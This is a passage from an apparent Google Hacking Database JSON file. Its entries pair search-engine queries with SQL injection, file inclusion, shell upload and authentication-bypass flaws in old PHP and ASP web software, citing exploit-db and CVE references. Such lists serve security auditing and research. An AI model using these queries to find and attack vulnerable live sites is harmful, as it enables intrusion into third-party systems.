description": "\"2004 PHPKick.de Version 0.8\"", "long description": "PHPKick v0.8 statistics.php SQL Injection - CVE: 2010-3029: http://www.exploit-db.com/exploits/14578", "submited": "2010-11-15", "request": "\" 2004 PHPKick.de Version 0.8\"", "id": 1651}, {"short description": "\"Powered by VS PANEL\"", "long description": "VS PANEL 7.3.6 (Cat_ID) Remote SQL Injection Vulnerability - CVE: 2009-3590: http://www.exploit-db.com/exploits/8506", "submited": "2010-11-15", "request": "\"Powered by VS PANEL\"", "id": 1652}, {"short description": "\"powered by phpmydirectory\" OR intext:\"2001-2006 phpMyDirectory.com\"", "long description": "phpMyDirectory 10.4.4 (ROOT_PATH) Remote Inclusion Vulnerability - CVE: 2006-2521: http://www.exploit-db.com/exploits/1808", "submited": "2010-11-15", "request": "\"powered by phpmydirectory\" OR intext:\"2001-2006 phpMyDirectory.com\"", "id": 1653}, {"short description": "intext:\"Kalimat news system v 1.0\"", "long description": "kalimat new system v 1.0 (index.php) SQL Injection: http://www.exploit-db.com/exploits/11563", "submited": "2010-11-15", "request": "intext:\"Kalimat news system v 1.0\"", "id": 1654}, {"short description": "Powered by: PhotoPost PHP 4.6", "long description": "PhotoPost PHP SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14446", "submited": "2010-11-15", "request": "Powered by: PhotoPost PHP 4.6", "id": 1655}, {"short description": "\"Powered by Maian Recipe v1.0\"", "long description": "Maian Recipe 1.0 (path_to_folder) Remote File Include Vulnerability - CVE: 2007-0848: http://www.exploit-db.com/exploits/3284", "submited": "2010-11-15", "request": "\"Powered by Maian Recipe v1.0\"", "id": 1656}, {"short description": "\"Powered by CommonSense CMS\"", "long description": "CommonSense CMS Sql Injection Vulnerability: http://www.exploit-db.com/exploits/13762", "submited": "2010-11-15", "request": "\"Powered by CommonSense CMS\"", "id": 1657}, {"short description": "\"Eyeland Studio Inc. 
All Rights Reserved.\" inurl:game.php", "long description": "Eyeland Studio Inc. (game.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13858", "submited": "2010-11-15", "request": "\"Eyeland Studio Inc. All Rights Reserved.\" inurl:game.php", "id": 1658}, {"short description": "\"powered by Pagetool\"", "long description": "Pagetool 1.07 (news_id) Remote SQL Injection Vulnerability - CVE: 2007-3402: http://www.exploit-db.com/exploits/4107", "submited": "2010-11-15", "request": "\"powered by Pagetool\"", "id": 1659}, {"short description": "powered by jshop", "long description": "Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability - CVE: 2007-0232: http://www.exploit-db.com/exploits/3113", "submited": "2010-11-15", "request": "powered by jshop", "id": 1660}, {"short description": "/modules/mx_links/", "long description": "mxBB Module WebLinks 2.05 Remote Inclusion Vulnerability - CVE: 2006-6645: http://www.exploit-db.com/exploits/2939", "submited": "2010-11-15", "request": "/modules/mx_links/", "id": 1661}, {"short description": "inurl:\"?pageNum_RSnews\"&view", "long description": "NUs Newssystem v1.02 (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11674", "submited": "2010-11-15", "request": "inurl:\"?pageNum_RSnews\"&view", "id": 1662}, {"short description": "inurl:index.php?option=com_directory", "long description": "Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability - CVE: 2008-0690: http://www.exploit-db.com/exploits/5047", "submited": "2010-11-15", "request": "inurl:index.php?option=com_directory", "id": 1663}, {"short description": "\"Powered By DynamicPAD\"", "long description": "DynamicPAD 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities - CVE: 2007-2527: http://www.exploit-db.com/exploits/3868", "submited": "2010-11-15", "request": "\"Powered By DynamicPAD\"", "id": 1664}, {"short description": "\"Powered by : elkagroup.com\"", "long description": "elkagroup (pid ) 
Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10836", "submited": "2010-11-15", "request": "\"Powered by : elkagroup.com\"", "id": 1666}, {"short description": "\"com_joom12pic\"", "long description": "Joomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability - CVE: 2007-4954: http://www.exploit-db.com/exploits/4416", "submited": "2010-11-15", "request": "\"com_joom12pic\"", "id": 1667}, {"short description": "\"Starting bid\" \"Powered by SoftbizScripts\"", "long description": "Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln - CVE: 2007-5999: http://www.exploit-db.com/exploits/4617", "submited": "2010-11-15", "request": "\"Starting bid\" \"Powered by SoftbizScripts\"", "id": 1668}, {"short description": "\"Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license", "long description": "Liberum Help Desk 0.97.3 (details.asp) SQL Injection Vulnerability - CVE: 2006-6160: http://www.exploit-db.com/exploits/2846", "submited": "2010-11-15", "request": "\"Liberum Help Desk, Copyright (C) 2001 Doug Luxem. 
Please view the license", "id": 1669}, {"short description": "allinurl:\"jokes.php?catagorie=\"", "long description": "Jokes Site Script (jokes.php?catagorie) SQL Injection Vulnerability - CVE: 2008-2065: http://www.exploit-db.com/exploits/5508", "submited": "2010-11-15", "request": "allinurl:\"jokes.php?catagorie=\"", "id": 1670}, {"short description": "\"Created by weenCompany\"", "long description": "weenCompany SQL Injection Vulnerability - CVE: 2009-4423: http://www.exploit-db.com/exploits/10606", "submited": "2010-11-15", "request": "\"Created by weenCompany\"", "id": 1671}, {"short description": "intext:\"Powered by eStore v1.0.2\"", "long description": "eStore v1.0.2 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10784", "submited": "2010-11-15", "request": "intext:\"Powered by eStore v1.0.2\"", "id": 1672}, {"short description": "\"Powered by: Elite Gaming Ladders v3.2\"", "long description": "Elite Gaming Ladders 3.2 (platform) SQL Injection Vulnerability - CVE: 2009-3314: http://www.exploit-db.com/exploits/9702", "submited": "2010-11-15", "request": "\"Powered by: Elite Gaming Ladders v3.2\"", "id": 1673}, {"short description": "php-addressbook v3.1.5", "long description": "php-addressbook v3.1.5(edit.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10877", "submited": "2010-11-15", "request": "php-addressbook v3.1.5", "id": 1674}, {"short description": "\"Powered by ParsBlogger\"", "long description": "ParsBlogger (blog.asp wr) Remote SQL Injection Vulnerability - CVE: 2008-5637: http://www.exploit-db.com/exploits/7239", "submited": "2010-11-15", "request": "\"Powered by ParsBlogger\"", "id": 1676}, {"short description": "intitle:\"vrnews v1\"", "long description": "VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability - CVE: 2007-3611: http://www.exploit-db.com/exploits/4150", "submited": "2010-11-15", "request": "intitle:\"vrnews v1\"", "id": 1677}, {"short description": 
"inurl:\"customer_testimonials.php\"", "long description": "osCommerce Addon Customer Testimonials 3.1 SQL Injection Vulnerability - CVE: 2008-0719: http://www.exploit-db.com/exploits/5075", "submited": "2010-11-15", "request": "inurl:\"customer_testimonials.php\"", "id": 1678}, {"short description": "\"Powered by Espinas IT\"", "long description": "Espinas CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12100", "submited": "2010-11-15", "request": "\"Powered by Espinas IT\"", "id": 1679}, {"short description": "\"Powered by iNetScripts\"", "long description": "Powered by iNetScripts: Shell Upload Vulnerability: http://www.exploit-db.com/exploits/12384", "submited": "2010-11-15", "request": "\"Powered by iNetScripts\"", "id": 1681}, {"short description": "Maintained with the Ocean12 Poll Manager Pro v1.00", "long description": "Ocean12 Poll Manager Pro Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7246", "submited": "2010-11-15", "request": "Maintained with the Ocean12 Poll Manager Pro v1.00", "id": 1682}, {"short description": "allinurl: \"com_glossary\"", "long description": "Mambo Component Glossary 2.0 (catid) SQL Injection Vulnerability - CVE: 2008-0514: http://www.exploit-db.com/exploits/5010", "submited": "2010-11-15", "request": "allinurl: \"com_glossary\"", "id": 1683}, {"short description": "\"2009 Azimut Technologie\"", "long description": "Azimut Technologie Admin Login Bypass vulnerability: http://www.exploit-db.com/exploits/12695", "submited": "2010-11-15", "request": "\"2009 Azimut Technologie\"", "id": 1684}, {"short description": "inurl:buyer/about_us.php?BuyerID", "long description": "Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12612", "submited": "2010-11-15", "request": "inurl:buyer/about_us.php?BuyerID", "id": 1685}, {"short description": "Maintained with the Ocean12 Calendar Manager Gold v2.04", "long description": "Ocean12 Calendar Manager 
Gold Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7247", "submited": "2010-11-15", "request": "Maintained with the Ocean12 Calendar Manager Gold v2.04", "id": 1686}, {"short description": "pagerank-0-topliste.html OR pagerank-0-tipp.html", "long description": "phpscripts Ranking Script Insecure Cookie Handling Vulnerability - CVE: 2008-6092: http://www.exploit-db.com/exploits/6649", "submited": "2010-11-15", "request": "pagerank-0-topliste.html OR pagerank-0-tipp.html", "id": 1687}, {"short description": "Copyright 2007 BrowserCRM Ltd", "long description": "BrowserCRM 5.002.00 (clients.php) Remote File Inclusion Vulnerability - CVE: 2008-2689: http://www.exploit-db.com/exploits/5757", "submited": "2010-11-15", "request": "Copyright 2007 BrowserCRM Ltd", "id": 1688}, {"short description": "Powered by UCenter inurl:shop.php?ac=view", "long description": "UCenter Home 2.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14997", "submited": "2010-11-15", "request": "Powered by UCenter inurl:shop.php?ac=view", "id": 1689}, {"short description": "intext:\"Powered By : Yamamah Version 1.00\"", "long description": "Yamamah 1.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13849", "submited": "2010-11-15", "request": "intext:\"Powered By : Yamamah Version 1.00\"", "id": 1690}, {"short description": "\"Sinapis by scripter.ch\"", "long description": "Sinapis Forum 2.2 (sinapis.php fuss) Remote File Include Vulnerability - CVE: 2007-1131: http://www.exploit-db.com/exploits/3367", "submited": "2010-11-15", "request": "\"Sinapis by scripter.ch\"", "id": 1693}, {"short description": "\"Powered by BosClassifieds Classified Ads System\"", "long description": "BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability - CVE: 2008-1838: http://www.exploit-db.com/exploits/5444", "submited": "2010-11-15", "request": "\"Powered by BosClassifieds Classified Ads System\"", "id": 1694}, {"short description": "\"Powered by 
RGameScript\"", "long description": "RGameScript Pro (page.php id) Remote File Inclusion Vulnerability - CVE: 2007-3980: http://www.exploit-db.com/exploits/4210", "submited": "2010-11-15", "request": "\"Powered by RGameScript\"", "id": 1696}, {"short description": "inurl:\"/files/redirect.asp\"", "long description": "JBS v2.0 | JBSX - Administration panel bypass and Malicious File Upload Vulnerability: http://www.exploit-db.com/exploits/10161", "submited": "2010-11-15", "request": "inurl:\"/files/redirect.asp\"", "id": 1698}, {"short description": "\"Easy-Clanpage v2.2\"", "long description": "Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability - CVE: 2008-1425: http://www.exploit-db.com/exploits/5275", "submited": "2010-11-15", "request": "\"Easy-Clanpage v2.2\"", "id": 1700}, {"short description": "inurl:\"/plugins/ImageManager/manager.php\"", "long description": "Wordpress Image Manager Plugins Shell Upload Vulnerability: http://www.exploit-db.com/exploits/10325", "submited": "2010-11-15", "request": "inurl:\"/plugins/ImageManager/manager.php\"", "id": 1702}, {"short description": "\"com_joomlaflashfun\"", "long description": "Joomla Component Flash Fun! 
1.0 Remote File Inclusion Vulnerability - CVE: 2007-4955: http://www.exploit-db.com/exploits/4415", "submited": "2010-11-15", "request": "\"com_joomlaflashfun\"", "id": 1703}, {"short description": "Powered by BKWorks ProPHP Version 0.50 Beta 1", "long description": "BKWorks ProPHP 0.50b1 (Auth Bypass) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7726", "submited": "2010-11-15", "request": "Powered by BKWorks ProPHP Version 0.50 Beta 1", "id": 1704}, {"short description": "inurl:\"whoiscart/admin/hostinginterfaces/\"", "long description": "WHOISCART Scripting Vulnerability: http://www.exploit-db.com/exploits/10812", "submited": "2010-11-15", "request": "inurl:\"whoiscart/admin/hostinginterfaces/\"", "id": 1705}, {"short description": "Powered by Sisfo Kampus 2006", "long description": "Sisfo Kampus 2006 (blanko.preview.php) Local File Disclosure Vuln - CVE: 2007-4820: http://www.exploit-db.com/exploits/4380", "submited": "2010-11-15", "request": "Powered by Sisfo Kampus 2006", "id": 1706}, {"short description": "inurl:\"sticker/sticker.php?id=\"", "long description": "2Capsule (sticker.php id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7631", "submited": "2010-11-15", "request": "inurl:\"sticker/sticker.php?id=\"", "id": 1708}, {"short description": "inurl:quizinfo.php", "long description": "PHP-MySQL-Quiz SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10876", "submited": "2010-11-15", "request": "inurl:quizinfo.php", "id": 1709}, {"short description": "\"Powered by Md-Pro\"", "long description": "Md-Pro 1.0.8x (Topics topicid) Remote SQL Injection Vulnerability - CVE: 2007-3938: http://www.exploit-db.com/exploits/4199", "submited": "2010-11-15", "request": "\"Powered by Md-Pro\"", "id": 1710}, {"short description": "inurl:\"index.php?option=com_simpleboard\"", "long description": "Mambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability - CVE: 2008-1077: 
http://www.exploit-db.com/exploits/5195", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_simpleboard\"", "id": 1711}, {"short description": "inurl:\"tradeCategory.php?id= \"", "long description": "Hampshire Trading Standards Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12768", "submited": "2010-11-15", "request": "inurl:\"tradeCategory.php?id= \"", "id": 1712}, {"short description": "inurl:\"com_omphotogallery\"", "long description": "Joomla Omilen Photo Gallery 0.5b Local File Inclusion Vulnerability - CVE: 2009-4202: http://www.exploit-db.com/exploits/8870", "submited": "2010-11-15", "request": "inurl:\"com_omphotogallery\"", "id": 1713}, {"short description": "inurl:\"sinagb.php\"", "long description": "Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include Vulnerability - CVE: 2007-1130: http://www.exploit-db.com/exploits/3366", "submited": "2010-11-15", "request": "inurl:\"sinagb.php\"", "id": 1716}, {"short description": "inurl:csc_article_details.php", "long description": "CaupoShop Classic 1.3 (saArticle[ID]) Remote SQL Injection Vulnerability - CVE: 2008-2866: http://www.exploit-db.com/exploits/5865", "submited": "2010-11-15", "request": "inurl:csc_article_details.php", "id": 1717}, {"short description": "inurl:index.php?page=img Powered By Mini File Host", "long description": "Mini File Host 1.x Arbitrary PHP File Upload Vulnerability - CVE: 2008-6785: http://www.exploit-db.com/exploits/7509", "submited": "2010-11-15", "request": "inurl:index.php?page=img Powered By Mini File Host", "id": 1718}, {"short description": "allinurl:com_pccookbook", "long description": "pc_cookbook Mambo Component 0.3 Include Vulnerability - CVE: 2006-3530: http://www.exploit-db.com/exploits/2024", "submited": "2010-11-15", "request": "allinurl:com_pccookbook", "id": 1720}, {"short description": "\"Powered by LDU\"", "long description": "LDU 8.x (polls.php) Remote SQL Injection Vulnerability: 
http://www.exploit-db.com/exploits/2871", "submited": "2010-11-15", "request": "\"Powered by LDU\"", "id": 1721}, {"short description": "intext:\"powered by tincan ltd\"", "long description": "tincan ltd (section) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11113", "submited": "2010-11-15", "request": "intext:\"powered by tincan ltd\"", "id": 1722}, {"short description": "\"Powered by nzFotolog v0.4.1 2005-2006 Ricardo Amaral\"", "long description": "nzFotolog 0.4.1 (action_file) Local File Inclusion Vulnerability - CVE: 2008-3405: http://www.exploit-db.com/exploits/6164", "submited": "2010-11-15", "request": "\"Powered by nzFotolog v0.4.1 2005-2006 Ricardo Amaral\"", "id": 1723}, {"short description": "\"REALTOR 747 - Version 4.11\"", "long description": "Realtor 747 (define.php INC_DIR) Remote File Inclusion Vulnerability - CVE: 2009-0495: http://www.exploit-db.com/exploits/7743", "submited": "2010-11-15", "request": "\"REALTOR 747 - Version 4.11\"", "id": 1724}, {"short description": "inurl:\"view_group.php?group_id=\"", "long description": "Vastal I-Tech SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12845", "submited": "2010-11-15", "request": "inurl:\"view_group.php?group_id=\"", "id": 1725}, {"short description": "\"CzarNews v1.12 \" | \"CzarNews v1.13\" | \"CzarNews v1.14 \"", "long description": "CzarNews 1.14 (tpath) Remote File Inclusion Vulnerability - CVE: 2006-3685: http://www.exploit-db.com/exploits/2009", "submited": "2010-11-15", "request": "\"CzarNews v1.12 \" | \"CzarNews v1.13\" | \"CzarNews v1.14 \"", "id": 1726}, {"short description": "inurl:\"filebase.php\" \"Powered by phpBB\"", "long description": "phpBB Mod FileBase (id) Remote SQL Injection Vulnerability - CVE: 2008-1305: http://www.exploit-db.com/exploits/5236", "submited": "2010-11-15", "request": "inurl:\"filebase.php\" \"Powered by phpBB\"", "id": 1728}, {"short description": "allinurl: \"name Sections op viewarticle artid\"", "long description": 
"PHP-Nuke Module Sections (artid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5154", "submited": "2010-11-15", "request": "allinurl: \"name Sections op viewarticle artid\"", "id": 1729}, {"short description": "\"Powered by samart-cms\"", "long description": "samart-cms 2.0 (contentsid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5862", "submited": "2010-11-15", "request": "\"Powered by samart-cms\"", "id": 1730}, {"short description": "Ultimate-Fun-Book 1.02", "long description": "Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability - CVE: 2007-1059: http://www.exploit-db.com/exploits/3336", "submited": "2010-11-15", "request": "Ultimate-Fun-Book 1.02", "id": 1731}, {"short description": "allinurl: \"modules/dictionary/detail.php?id\"", "long description": "XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability - CVE: 2009-4582: http://www.exploit-db.com/exploits/10807", "submited": "2010-11-15", "request": "allinurl: \"modules/dictionary/detail.php?id\"", "id": 1732}, {"short description": "\"Copyright (C) 2000 Phorum Development Team\"", "long description": "Phorum 3.2.11 (common.php) Remote File Include Vulnerability - CVE: 2006-6550: http://www.exploit-db.com/exploits/2894", "submited": "2010-11-15", "request": "\"Copyright (C) 2000 Phorum Development Team\"", "id": 1733}, {"short description": "inurl:flashblog.html OR inurl:/flashblog/", "long description": "FlashBlog 0.31b Remote Arbitrary File Upload Vulnerability - CVE: 2008-2574: http://www.exploit-db.com/exploits/5728", "submited": "2010-11-15", "request": "inurl:flashblog.html OR inurl:/flashblog/", "id": 1734}, {"short description": "\"Powered By CMS-BRD\"", "long description": "CMS-BRD (menuclick) Remote SQL Injection Vulnerability - CVE: 2008-2837: http://www.exploit-db.com/exploits/5863", "submited": "2010-11-15", "request": "\"Powered By CMS-BRD\"", "id": 1736}, {"short description": "\"inurl:/admin/\" 
\"ImageVue\"", "long description": "ImageVue 2.0 Remote Admin Login: http://www.exploit-db.com/exploits/10630", "submited": "2010-11-15", "request": "\"inurl:/admin/\" \"ImageVue\"", "id": 1737}, {"short description": "\"TROforum 0.1\"", "long description": "TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability - CVE: 2007-2937: http://www.exploit-db.com/exploits/3995", "submited": "2010-11-15", "request": "\"TROforum 0.1\"", "id": 1738}, {"short description": "\"Uploader by CeleronDude.\"", "long description": "Uploader by CeleronDude 5.3.0 Shell Upload: http://www.exploit-db.com/exploits/10523", "submited": "2010-11-15", "request": "\"Uploader by CeleronDude.\"", "id": 1739}, {"short description": "\"Review Script\" \"Phil Taylor\"", "long description": "Mambo Component Comments 0.5.8.5g SQL Injection Vulnerability - CVE: 2008-0773: http://www.exploit-db.com/exploits/5094", "submited": "2010-11-15", "request": "\"Review Script\" \"Phil Taylor\"", "id": 1740}, {"short description": "intitle:Mp3 ToolBox 1.0", "long description": "Mp3 ToolBox 1.0 beta 5 (skin_file) Remote File Inclusion Vulnerability - CVE: 2007-6139: http://www.exploit-db.com/exploits/4650", "submited": "2010-11-15", "request": "intitle:Mp3 ToolBox 1.0", "id": 1741}, {"short description": "Powered by: Maian Greetings v2.1", "long description": "Maian Greetings 2.1 Insecure Cookie Handling Vulnerability - CVE: 2008-7086: http://www.exploit-db.com/exploits/6050", "submited": "2010-11-15", "request": "Powered by: Maian Greetings v2.1", "id": 1742}, {"short description": "allinurl: \"com_alberghi\" detail", "long description": "Joomla Component Alberghi 2.1.3 (id) SQL Injection Vulnerability - CVE: 2008-1459: http://www.exploit-db.com/exploits/5278", "submited": "2010-11-15", "request": "allinurl: \"com_alberghi\" detail", "id": 1743}, {"short description": "\"Powered By phpBB Garage 1.2.0\"", "long description": "phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability - CVE: 
2007-6223: http://www.exploit-db.com/exploits/4686", "submited": "2010-11-15", "request": "\"Powered By phpBB Garage 1.2.0\"", "id": 1744}, {"short description": "inurl:index.php?option=com_ynews", "long description": "Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability - CVE: 2008-0653: http://www.exploit-db.com/exploits/5072", "submited": "2010-11-15", "request": "inurl:index.php?option=com_ynews", "id": 1746}, {"short description": "\"Powie's PSCRIPT MatchMaker 4.05\"", "long description": "Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability - CVE: 2006-6039: http://www.exploit-db.com/exploits/2798", "submited": "2010-11-15", "request": "\"Powie's PSCRIPT MatchMaker 4.05\"", "id": 1747}, {"short description": "inurl:etkinlikbak.asp", "long description": "Okul Web Otomasyon Sistemi 4.0.1 Remote SQL Injection Vulnerability - CVE: 2007-0305: http://www.exploit-db.com/exploits/3135", "submited": "2010-11-15", "request": "inurl:etkinlikbak.asp", "id": 1748}, {"short description": "\"Copyright 2008 ImenAfzar ver :2.0.0.0\"", "long description": "Namad (IMenAfzar) 2.0.0.0 Remote File Disclosure Vulnerability: http://www.exploit-db.com/exploits/8734", "submited": "2010-11-15", "request": "\"Copyright 2008 ImenAfzar ver :2.0.0.0\"", "id": 1749}, {"short description": "allinurl:com_comprofiler", "long description": "Joomla Community Builder 1.0.1 Blind SQL Injection Vulnerability - CVE: 2008-2093: http://www.exploit-db.com/exploits/5491", "submited": "2010-11-15", "request": "allinurl:com_comprofiler", "id": 1750}, {"short description": "inurl:\"com_joomlaradiov5\"", "long description": "Joomla Component joomlaradio v5 Remote File Inclusion Vulnerability - CVE: 2007-4923: http://www.exploit-db.com/exploits/4401", "submited": "2010-11-15", "request": "inurl:\"com_joomlaradiov5\"", "id": 1751}, {"short description": "\"powered by phpAdBoard\"", "long description": "phpAdBoard (php uploads) Arbitrary File Upload Vulnerability - CVE: 
2008-6921: http://www.exploit-db.com/exploits/7562", "submited": "2010-11-15", "request": "\"powered by phpAdBoard\"", "id": 1752}, {"short description": "\"Powered by Quick.Cms\"", "long description": "Quick.Cms.Lite 0.5 (id) Remote SQL Injection Vulnerability - CVE: 2009-1410: http://www.exploit-db.com/exploits/8505", "submited": "2010-11-15", "request": "\"Powered by Quick.Cms\"", "id": 1753}, {"short description": "\"Powered by wpQuiz\" inurl:index.php", "long description": "wpQuiz v2.7 Authentication Bypass Vulnerability - CVE: 2010-3608: http://www.exploit-db.com/exploits/15075", "submited": "2010-11-15", "request": "\"Powered by wpQuiz\" inurl:index.php", "id": 1754}, {"short description": "\"Powered by UCStats version 1.1\"", "long description": "UCStats v1.1 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10891", "submited": "2010-11-15", "request": "\"Powered by UCStats version 1.1\"", "id": 1755}, {"short description": "\"Powered by CCLeague Pro\"", "long description": "CCLeague Pro 1.2 Insecure Cookie Authentication Vulnerability - CVE: 2008-5123: http://www.exploit-db.com/exploits/5888", "submited": "2010-11-15", "request": "\"Powered by CCLeague Pro\"", "id": 1756}, {"short description": "intitle:Bilder Galerie 1.1 or intitle:Bilder Galerie", "long description": "MatPo Bilder Galerie 1.1 Remote File Inclusion Vulnerability - CVE: 2007-6649: http://www.exploit-db.com/exploits/4815", "submited": "2010-11-15", "request": "intitle:Bilder Galerie 1.1 or intitle:Bilder Galerie", "id": 1757}, {"short description": "\"Powered by: PostGuestbook 0.6.1\"", "long description": "PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability - CVE: 2007-1372: http://www.exploit-db.com/exploits/3423", "submited": "2010-11-15", "request": "\"Powered by: PostGuestbook 0.6.1\"", "id": 1758}, {"short description": "\"powered by sunshop\"", "long description": "SunShop Shopping Cart 3.5 (abs_path) RFI Vulnerabilities - CVE: 2007-2070: 
http://www.exploit-db.com/exploits/3748", "submited": "2010-11-15", "request": "\"powered by sunshop\"", "id": 1759}, {"short description": "\"SQuery 4.5\" |\"SQuery 4.0\" |\"SQuery 3.9\" | inurl:\"modules.php?name=SQuery\"", "long description": "SQuery 4.5 (gore.php) Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/2003", "submited": "2010-11-15", "request": "\"SQuery 4.5\" |\"SQuery 4.0\" |\"SQuery 3.9\" | inurl:\"modules.php?name=SQuery\"", "id": 1760}, {"short description": "Powered by SkaDate Dating", "long description": "SkaDate Online 5.0/6.0 Remote File Disclosure Vulnerability - CVE: 2007-5299: http://www.exploit-db.com/exploits/4493", "submited": "2010-11-15", "request": "Powered by SkaDate Dating", "id": 1761}, {"short description": "inurl:\"ibase site:de\"", "long description": "ibase 2.03 (download.php) Remote File Disclosure Vulnerability - CVE: 2008-6288: http://www.exploit-db.com/exploits/6126", "submited": "2010-11-15", "request": "inurl:\"ibase site:de\"", "id": 1762}, {"short description": "\"Powered by sNews\"", "long description": "sNews v1.7 (index.php?category) SQL Injection Vulnerability - CVE: 2010-2926: http://www.exploit-db.com/exploits/14465", "submited": "2010-11-15", "request": "\"Powered by sNews\"", "id": 1763}, {"short description": "\"Powered by Gravy Media\"", "long description": "Gravy Media Photo Host 1.0.8 Local File Disclosure Vulnerability - CVE: 2009-2184: http://www.exploit-db.com/exploits/8996", "submited": "2010-11-15", "request": "\"Powered by Gravy Media\"", "id": 1764}, {"short description": "inurl:\"index.php?option=com_djiceshoutbox\"", "long description": "Joomla Djice Shoutbox 1.0 Permanent XSS Vulnerability: http://www.exploit-db.com/exploits/8197", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_djiceshoutbox\"", "id": 1765}, {"short description": "inurl:com_filiale", "long description": "Joomla Component Filiale 1.0.4 (idFiliale) SQL Injection Vulnerability - CVE: 
2008-1935: http://www.exploit-db.com/exploits/5488", "submited": "2010-11-15", "request": "inurl:com_filiale", "id": 1766}, {"short description": "\"Powered By AV Arcade\"", "long description": "AV Arcade 2.1b (index.php id) Remote SQL Injection Vulnerability - CVE: 2007-3563: http://www.exploit-db.com/exploits/4138", "submited": "2010-11-15", "request": "\"Powered By AV Arcade\"", "id": 1767}, {"short description": "Powered by NATTERCHAT v 1.1", "long description": "NatterChat 1.1 (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2008-7049: http://www.exploit-db.com/exploits/7172", "submited": "2010-11-15", "request": "Powered by NATTERCHAT v 1.1", "id": 1768}, {"short description": "ogrencimezunlar.php", "long description": "Okul Merkezi Portal 1.0 (ataturk.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/3012", "submited": "2010-11-15", "request": "ogrencimezunlar.php", "id": 1769}, {"short description": "inurl:index.php?option=com_yanc \"listid\"", "long description": "Joomla Component com_yanc SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11603", "submited": "2010-11-15", "request": "inurl:index.php?option=com_yanc \"listid\"", "id": 1770}, {"short description": "Powered by 6rbScript", "long description": "6rbScript (news.php newsid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5663", "submited": "2010-11-15", "request": "Powered by 6rbScript", "id": 1771}, {"short description": "powered by vpasp v 6.50", "long description": "VP-ASP Shopping Cart 6.50 Database Disclosure Vulnerability - CVE: 2008-5929: http://www.exploit-db.com/exploits/7438", "submited": "2010-11-15", "request": "powered by vpasp v 6.50", "id": 1772}, {"short description": "allinurl:\"/questcms/\"", "long description": "QuestCMS (main.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/2137", "submited": "2010-11-15", "request": "allinurl:\"/questcms/\"", "id": 1773}, {"short description": 
"inurl:com_eQuotes", "long description": "Joomla Component equotes 0.9.4 Remote SQL injection Vulnerability - CVE: 2008-2628: http://www.exploit-db.com/exploits/5723", "submited": "2010-11-15", "request": "inurl:com_eQuotes", "id": 1774}, {"short description": "\"Upload unique IP List:\" AND \"The Ultimate Fake Hit Generator - BOOST YOUR ALEXA RANK\"", "long description": "Fake Hit Generator 2.2 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/10230", "submited": "2010-11-15", "request": "\"Upload unique IP List:\" AND \"The Ultimate Fake Hit Generator - BOOST YOUR ALEXA RANK\"", "id": 1775}, {"short description": "\"Powered by Xplode CMS\"", "long description": "Xplode CMS (wrap_script) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8373", "submited": "2010-11-15", "request": "\"Powered by Xplode CMS\"", "id": 1776}, {"short description": "Powered by Jewelry Cart Software", "long description": "Jewelry Cart Software (product.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11826", "submited": "2010-11-15", "request": "Powered by Jewelry Cart Software", "id": 1779}, {"short description": "\"Diseo Web Hernest Consulting S.L.\"", "long description": "Administrador de Contenidos Admin Login Bypass vulnerability: http://www.exploit-db.com/exploits/12527", "submited": "2010-11-15", "request": "\"Diseo Web Hernest Consulting S.L.\"", "id": 1780}, {"short description": "inurl:com_cpg", "long description": "Mambo CopperminePhotoGalery Component Remote Include Vulnerability - CVE: 2006-4321: http://www.exploit-db.com/exploits/2196", "submited": "2010-11-15", "request": "inurl:com_cpg", "id": 1783}, {"short description": "inurl:ratelink.php?lnkid=", "long description": "Link Trader (lnkid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10834", "submited": "2010-11-15", "request": "inurl:ratelink.php?lnkid=", "id": 1784}, {"short description": "\"CNStats 2.9\"", "long description": "CNStats 2.9 
